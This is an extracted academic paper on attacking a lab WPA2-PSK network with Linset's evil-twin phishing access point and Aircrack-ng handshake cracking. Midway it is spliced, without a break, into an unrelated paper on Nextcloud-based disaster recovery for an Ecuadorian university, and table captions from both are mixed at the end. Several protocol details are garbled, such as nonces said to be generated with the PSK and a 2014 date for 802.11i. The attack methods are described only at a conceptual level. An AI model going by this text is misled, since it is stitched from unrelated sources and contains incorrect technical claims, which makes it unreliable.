Evaluation of the WPA2-PSK wireless network security protocol using the Linset and Aircrack-ng tools

Due to the emergence of new techniques and technologies of intrusion, the wireless network protocols have become obsolete; for this reason, this research seeks to violate and evaluate the security of the WPA2 protocol that is widely used by the Colombian service providers. The first section of this paper introduces the WPA2 protocol by describing its operation and the potential attacks it may suffer; the second part details the methodology used to collect the tests data and to carry out the evaluation necessary for the preparation of this article. In addition, we present the Linset and Aircrack-ng tools for auditing wireless networks that were selected to assess the security of the protocol. Finally, we show the results and conclusions

Evaluation of the WPA2-PSK wireless network security protocol using the Linset and Aircrack-ng tools

I. IntroductIon
Cyber-attacks are a growing trend in modern Colombian society.These attacks impact users with information on the Internet [1] because the information traffic generated when files are moved from a computer or cell phone to the Internet, always creates an encryption that allows hiding information frames and packages necessary between the modem and the sending device.For this reason, it is necessary to know how such information packages, which contain important information for the security of our data, are attacked.

A. What is WPA2-PSK?
Among the existent wireless networks that allow interconnecting two or more computers to transmit data, the best known are WPAN (Wireless Personal Area Network), WLAN (Wireless Local Area Network), WMAN (Wireless Metropolitan Network), and WWAN (Wireless Wide Area Network).Each network has an associated protocol and IEEE standard that allow the review and the subsequent communication in a local or global network.We will focus on the WLAN wireless network with WPA2-PSK protocol based on the IEEE 802.11i standard that was released on July 24, 2014 [3][4][5].
WPA (Wireless Protected Access) originated in the problems detected in the WEP, a previous security system created for wireless networks [6].WPA2-PSK (PSK acronym for Pre-Shared Key) is the evolution of the WPA protocol; it implements an algorithm based on a key of 8 to 63 characters, which is taken as a parameter, and with this value, a new key is randomly generated [6].
The operation of WPA2-PSK involves the following steps (Fig. 1): 1.The authenticator sends a message to the supplicant with a value generated randomly using its PSK key (an arbitrary value with no special meaning).This message is known as an authenticated nonce or simply nonce, because it contains a field called nonce whose value is generated randomly with the PSK key of the authenticator, as shown in Fig. 1, which was captured with Wireshark.In addition, the Replay Counter is an indicator that allows the authenticator and the supplicant to know the number of packages that have been previously sent [6].
2. The supplicant receives the message and generates another message called snonce (supplicant nonce), which is basically of the same type as the received anonce package, but contains a different nonce (an arbitrary text generated randomly using the PSK key of the supplicant) [6].
3. With the previous information, the supplicant creates the Pairwise Transient Key (PTK); this step is extremely important and, therefore, the Evaluation of the WPA2-PSK wireless network security protocol using the Linset and Aircrack-ng tools reader should pay more attention, because is where the "magic" of PSK and the dynamic generation of keys take place, which was implemented in the beginning to improve the security of WEP against fairly widespread attacks.PTK are the keys generated in each packet exchanged between the supplicant and the authenticator, and are generated using the Pairwise Master Key (PMK), but they are the same PSK code generated in step 1; that is, each PTK is generated dynamically by the supplicant PSK and the authenticator [6].
4. The procedure for generating the PTK key is really important, hence, its understanding is necessary.The PTK is generated by the PMK using a PTK random key generation function that takes the following parameters: 1) anonce, which is the package generated by the authenticator that contains a random text encrypted with its PSK key; 2) snonce, which is the package generated by the supplicant that contains a random text encrypted with its PSK key; 3) MAC authenticator; and 4) MAC supplicant [6].
5. The supplicant sends a packet to the authenticator with the snonce message and a MIC field (field encrypted using the Michael encryption mechanism) that allow performing an integral and consistent check of the packet; this field is generated by the supplicant using the PTK and the PMK [6].
6.With the package sent by the supplicant in step 5, the authenticator derives the PTK key, since it already knows the fields necessary to do the calculation: PMK, which is the same for both the supplicant and the authenticator, anonce, snonce, and the MAC addresses of the authenticator and the supplicant [6].
7. Once the authenticator has generated the PTK with the fields received from the previous packet (with the snonce field), it tries to generate the MIC field, since it has the same PTK and PSK as the supplicant.The MIC generated by the authenticator and the supplicant must be the same, and if that is the case, the authenticator sends a message to the supplicant of the type "Key Installation"; this message can be seen with the "Flag" of the type "Install Flag", which in turn can be seen in the third package exchanged in the authentication process [6].
8. The supplicant sends to the authenticator a "Key Install Acknowledgment" message, which simply confirms that, in this session of package exchange, the same PTK generated in the client and the AP were used.This package contains a "Key ACK" field with a value of zero, indicating that it is the last message sent in the authentication process between the supplicant and the authenticator [6].
Once the function of the WPA2-PSK protocol is understood, we can perform different types of attacks to detect its vulnerabilities.

B. Types of attack
Modems that create wireless networks for their users are vulnerable to several types of attack.The most common attacks are the following: 1. SYN saturation attack: flood network traffic.In other words, a single individual makes a large number of requests to the server, in this case the modem, which denies access to the rest of its users [7].

DoS attack:
It is a denial of service attack [8].

DDoS attack:
it is an extension of the DoS attack, but it attacks from different connection points [8].

Identity theft:
Phishing is based on social engineering that focuses on the fact that humans make the greatest errors [8].

Attack by intermediary:
It diverts packet information by changing it and returning altered information, or just checking what information is being handled by the target user [8].

II. Methodology
A. Software 1) WIFISLAX.Operating system based on Linux that can be used as a live cd or boot access on a USB; it was designed by www.seguridadwireless.net,and was adapted for Wireless [9].This OS is an audit tool for wireless networks that contains a set of tools to function.
Alberto Acosta-López -Elver Yesid Melo-Monroy -Pablo Andrés Linares-Murcia 2) Linset.Application to audit wireless networks that does not use decryption dictionaries to obtain the access code to the network.With this tool, the cooperation of the user, who is unaware of the attack, is of vital importance, which implies that the user has little or no knowledge of computer security.Linset creates a fake AP with the same ESSID, as the one we are attacking and without any type of encryption; in addition, it authenticates the APs of the legitimate clients, preventing them to authenticate, and making them access the AP created by this tool and enter the password of the network [10].
3) Operation.This tool attack the modem, allowing network users to connect, and then, creating a fake network to which users will connect and provide the network password.Once the password is obtained, the fake network is closed and the modem operation is released.

4) Aircrack-ng.
Complete suite of tools that audit wireless Wi-Fi networks.This tool focuses on different areas of security in wireless networks: packet-monitoring, attack, testing, and cracking [11].

5) VMware Workstation PRO (trial version).
This tool is one of the industry standard products to run multiple operating systems as virtual machines on a single PC.Thousands of IT professionals, developers, and businesses use Workstation Pro and Workstation Player to improve agility, productivity, and security [12].

6) Windows 8 Pro (trial version
).New operating system created by Microsoft.In this case, we will use Windows pro test version for the development of this research.

B. Hardware
Modem ZTE ZXV10 W300E (for home network use)

Desktop computer corei7 16 RAM
Network adapter TP-LINK WN725 (Does not support monitoring) Network adapter TP-LINK WN722N (Supports packet monitoring)

C. Methods
The modem was configured to generate a wireless network called Security, use the WPA2-PSK protocol, and generate the password for accessing the newly created network.In this case, the network was called PruebaArticulo, and the password was @Prueba@.
We performed the audit using attack by intermediary and DoS attack (for using decryption dictionaries known as brute force), and run ten tests for each technique.
First, we carried out a brute-force attack, that is, an information package was captured with the wireless network encrypted access key.Afterwards, we carried out an impersonation attack, in which a third network that impersonates the original network is created, while the victim sends the password of his/her wireless network.In both attacks, we evaluated anonymity and waiting time to obtain access.

III. results
This study allowed us to understand better the use of the audit tools.The focus of our analyses was to highlight the vulnerabilities of the security protocol; for this, we studied the following items: time to obtain the password, method, and visualization of the attack (Table 1).

table 1 Comparative table between the linset and airCraCk tools
Table 2 shows the length (hours) of each of the 10 tests conducted with the Aircrack tool; whereas Table 3 shows the length (minutes) of the attacks with the Linset tool.The network attack using Linset was one of the most effective; however, this is not because of the results, but because of the lack of defense methods.Therefore, as long as the attacker has a good network card, the attack is imminent and difficult to avoid if the user is unaware of it.

IV. dIscussIon
Although companies in Colombia like Digiware are dedicated to computer security, no system is 100 % safe.What is really important for an adequate protection of our data is education; however, how do we obtain this knowledge?Are the supplier companies willing to give us basic training to at least change the password of our wireless network?The truth is that the knowledge we have today is quickly becoming obsolete, particularly in technology; what before lasted a little over a year, nowadays only last for weeks or sometimes days.In the current information age, it is necessary to have a minimum of security in our data, which is why a question arises: who will train us for this?
This article presents two tools to evaluate the security of our wireless networks, and the way the WPA2 security protocol works.Additionally, we provided elementary knowledge about the different types of attacks that currently affect wireless networks.Evidently, besides computer viruses, the attacks to the network infrastructure are problematic because they allow access to the users' sensitive data.

V. conclusIons
Linset employs more advanced techniques than Aircrack, seeking the ingenuousness of the user to appropriate the network´s password.It also uses a technique of alternative creation of networks contrary to Aircrack, which collects identification packages; in terms of time, Aircrack method is more expensive than Linset.Aircrack attacks on vulnerable networks are totally unavoidable, therefore, it would be necessary to find a solution.The delay time that the Linset tool has against Aircrack is limited with respect to time: A Linset attack is limited by the user´s patience who usually does not tolerate more than 15 minutes without giving up the password.An Aircrack attack is limited by the power of the attacking machine; depending on the capacity of the machine, the search can take from days to weeks or even up to one month.
Depending on the management of the company, it is necessary to train the employees to identify the attacks on the networks, and thus avoid providing relevant information so the attacker can access the network.A mechanism to increase the security of entry to a private Wi-Fi network is the authentication through the devices Mac addresses.This mechanism not only allows the known devices to access, but also provide a degree of security.

I. IntroductIon
The inclusion of Information and Communication Technologies (ICT) in education has taken a slow and uneven pace, both for their economic and human resources.As a consequence, in disaster situations there is no response that allows continuing the processes linked to administration, documentation, tracking, reporting, and delivery of educational courses.Given this, the computational cloud promises to reduce costs and offer high availability and longterm continuity [1].The cloud is considered a model of flexible delivery of ICT services that provide systems and networks with high transfer rates [2].
The computational cloud arises from the need to build less complex IT infrastructures in comparison with the traditional technological schemes [3][4][5][6], in which the technicians install, configure and improve the software systems, hence, the assets of infrastructure are inclined to quickly become obsolete.Therefore, using these computing platforms is a solution for IT users, as an intelligent technology that responds to the Smart Education model, by offering a robust infrastructure environment.
The vision of Smart University deploys a set of services that focus on large-scale interactions, conceiving the university as a deeply dynamic and innovative place.
To achieve this, Smart Education has its foundations on smart devices and emerging technologies [7] that respond to mobile learning.When using devices, it focuses on learner mobility, in contrast to traditional types of education [8].Ubiquitous technology focused on learning can be used anytime and anywhere, without limitations of time, location, desktop, or mobile environments.Thus, intelligent technologies such as the computational cloud promoted the appearance of Smart Education.In this way, the advent of computational cloud has generated additional options for educators and students, providing them with the means to express their research, studies, and creativity in a distinctive way [9].Its application not only alleviates the burden of educational institutions to manage the complex IT infrastructure, but also leads to great cost savings [10].
The present study focused on the recovery of services in educational environments, such as storage, communications, sharing, and file synchronization, by combining elements of the computational cloud supported by the Smart Education theory, such as the Synchronization and Use systems: Shared Enterprise File Synchronization and Sharing (EFSS).This allows us to respond to the particularities observed in disaster situations, such as the devastating earthquake of April 16, 2016, which left the education sector in the province of Manabí (Ecuador) out of operation due to the lack of a recovery plan in these eventualities of force majeure.
The rest of the article has been organized as follows: section 2 describes the state of art; section 3 synthesizes the applied research methods and techniques, as well as the activities carried out to bring the work to a successful conclusion; section 4 details the quantitative evaluation of the EFSS platforms; section 5 explains the start-up of the experiment; section 6 describes the experimental results of the EFSS implementations, and the execution of the developed routine in two EFSS instances, the measurement of the quality of use of the routine, and the discussion of the results obtained; finally, section 7 presents the conclusions and lines of future work based on the obtained results.

II. related work
In various sectors, the use of technology based on file sharing via Internet, among the users of an organization and in collaboration with others, is becoming more and more prevalent [11]; therefore, it requires a careful selection of the solution in terms of administration, security, and costs.
In education, cloud-computing services provide a faster recovery and discovery of information, allowing students to store and share documents in a more flexible environment, and remote access to materials between students and instructors [12].Computational clouds, in services such as Google Drive, Dropbox, Sky-Drive, and iCloud, offer the user the possibility of storing, reviewing, and accessing files synchronized among various devices [12], with a limiting use license that requires, among other aspects, a subscription fee and content restrictions.The main educational activities conducted in the computational cloud focus on discussing, planning, and using the interactive applications and services that are carried out in colleges and universities around the world [4,13].
Enterprise file synchronization and sharing services for educational environments in case of disaster With the advent of computer clouds, disaster recovery of data loss is now possible for the education sector.The traditional techniques used for disaster recovery are very expensive, and the education sector could not afford it due to limited funds [10].Scientific documentation on free computational clouds is scarce, and it is even more limited on disaster recovery on a free computational cloud.The application of cloud computing in the educational field is at an early stage in the scientific literature [14].

III. research desIgn
This research focused on implementing a recovery plan in case of disasters by using free computational clouds.
To achieve this, we applied the Research-Action methodology, framed in a bibliographical, descriptive analysis, and in a quantitative/qualitative evaluation.
In particular, we analyzed several free computational clouds and their relation to the processes that contribute to execute educational programs, when diagnosing the natural environment where the earthquake of April 16, 2016 took place, at the Universidad Laica Eloy Alfaro de Manabí (ULEAM), Ecuador.
The quantitative data were collected from experimental tests performed on each EFSS, which culminated in the development of a routine Shell script under the methodology of Experimental Software Engineering, specifically based on evidence.The main purpose was to improve decision making regarding the development and maintenance of software, integrating the best current evidence of research with practical experiences and human values [15].
To evaluate the EFSS, we carried out two activities.First, we evaluated and implemented three open source options: Nextcloud, Pydio and Seafile.Second, we prepared two test servers with the following characteristics: Intel (R) Xeon (R) CPU E3-1220 v3 @ 3.10GHz with 4 cores; 4 GB RAM memory; Ubuntu Server 14.04 with a kernel 3.13.0-85-64-GNU/LinuxUbuntu; two hard drives of 1 terabyte each.Each EFSS presents a logical layer architecture (Fig. 1), where the client layer is the interface or front-end of the user, with the services offered by the application.Ubiquity is a feature present in EFSS, which allows access from anywhere and at any time.

IV. QuantItatIVe and QualItatIVe eValuatIon oF the eFss
According to a thorough review of the state of the art, there are more than 100 commercial EFSS solutions in the market [16].However, due to the nature of this research, in which the University that served as a diagnosis is public, we framed the analysis in EFSS of free licensing.
Table 1 compares the characteristics of the EFSS, in terms of synchronization and storage.The installation requirements of each EFSS focused on an Apache web server, and the compatibility with databases such as MySQL and the GNU/Linux operating system.The versions of the EFSS analyzed were (a) Nextcloud 11.0.3,(b) Seafile 6.0.9, and (c) Pydio 7.0.4;some of the EFSS depend on packages according to the programming language in which they were developed.
After implementing the EFSS, we installed the monitoring applications to obtain accurate data for the evaluation: (a) JMeter, an application written in Java open source, tests the performance and functional behavior of Web applications; we used the 2.13.20 version for GNU/Linux [17]; (b) Cacti, the frontend for RRDTool, stores data that comes from the RRDTool database and shows them graphically, as The Disaster Recovery Plan intends to provide the authorities with the information necessary to resume the EFSS service in an appropriate and timely manner, for the following scenarios:

•
• Test period to make sure that the solution remains in operation.

• • Roles and responsibilities
The Disaster Recovery team, taking into consideration the current IT organization chart, will conform as follows (Fig. 4): of concurrent users that the EFSS supported when executing the assigned requests; Figure 7

B. Usability of the routine
When selecting metrics on the Quality of Use, we used log monitoring applications on the main processes of the routine.The results showed that the developed routine meets the requirements and generates a high degree of satisfaction (Table 3).These results come from the following metrics:

C. Discussion
The data indicate that Nextcloud performed remarkably better than its competitors, which have restricted certain modules and have a technical team under a business structure, instead of community and educational features such as those found in Nextcloud.On the other hand, the lack of a module that allows synchronizing the instances in Nextcloud was notorious.This motivated the implementation of a routine that added this feature, which we later verified in terms of functionality and usability, yielding very satisfactory data (Table 3).
In general, the test plan contemplated three clearly differentiated milestones.The initial phase corresponded to the preparation of the necessary environment, and the implementation and configuration of the necessary tools.The next phase Enterprise file synchronization and sharing services for educational environments in case of disaster was the execution of the control tests, following the designed plan.The final phase was the data analysis, in which all the data obtained during the previous executions were studied to present them in such a way that they provide as much information as possible.
From there, we proceeded to develop a routine to synchronize and remove the backup instance, product of the absence of this functionality in Nextcloud.The concept tests were carried out and the usability was evaluated.As a final product, the Disaster Recovery Plan was elaborated.
The opportunities found in Nextcloud are based on the nature of the project, which is completely open source, allowing us to detect a growth opportunity and thus develop a Bash routine to offer the continuity of storage and synchronization services.However, this implies a future development, which allows incorporating an emergency module and/or continuity in the configuration panel of the EFSS.

VII. conclusIons and Future work
In the present study, we configured three computational clouds EFSS under free licensing, and evaluated them quantitatively by measuring the time they used to respond all the requests and each individual request, as well as the number of concurrent users supported and the consumption of CPU and RAM resources.The results of these tests determined that Nextcloud is the best EFSS to implement in an educational scenario, taking into account the impact it generates and its real-time collaboration features.Subsequently, and given the absence of a synchronization functionality of Nextcloud instances, it was necessary to develop a routine that allows business continuity in the face of a disaster.This routine and subsequent Disaster Recovery Plan were prepared based on the ISO/IEC 25000 and 22301 standards.As future work, we plan to include the routine as a back-end package within the EFSS, for its implementation in GNU/Linux distributions.

authors' contrIbutIons
Delgado-Domínguez conducted the search, the recompilation, and the analysis of the papers referenced in this article, and contributed to write the manuscript.Fuertes-Díaz was the advisor of the project, and supervised the development of the DRP.Sánchez-Gordón contributed to write the manuscript and reviewed it.All authors read and approved the final manuscript.

••
EFSS server hard drive failures • • Power failures of the data center or the servers cold room • • Corrupt database • • No Apache service (HTTP) • • Total disqualification of the data center, due to any type of disaster • • During the failure of the previous points, the secondary server located outside the institution will be enabled, either in a national or international data center.The recovery procedures and the estimated time for the RTO (Target Recovery Time) and the RPO (Time Recovery Point) are based on assumptions that need validation: • • Implementation of a secondary server outside the institution with physical characteristics like those of the main server and equal software configurations • • Transfer of new files every 10 minutes from the main server to the secondary server • • Backup and verification of the integrity of the database • • The generated script for the transfer and treatment of the database generates alerts that should be taken seriously.

table 2 length
(in hours approx.) of an attaCk with airCraCk table 3 length (in min approx.) of an attaCk with linset

Table 2
describes the critical services in the EFSS.
depicts the average CPU consumption of each EFSS after 1, 5 and 15 minutes of execution; and Figure8details the average consumption of RAM memory for the execution of 6000 assigned requests.

table 3
valuation of the usability of the routine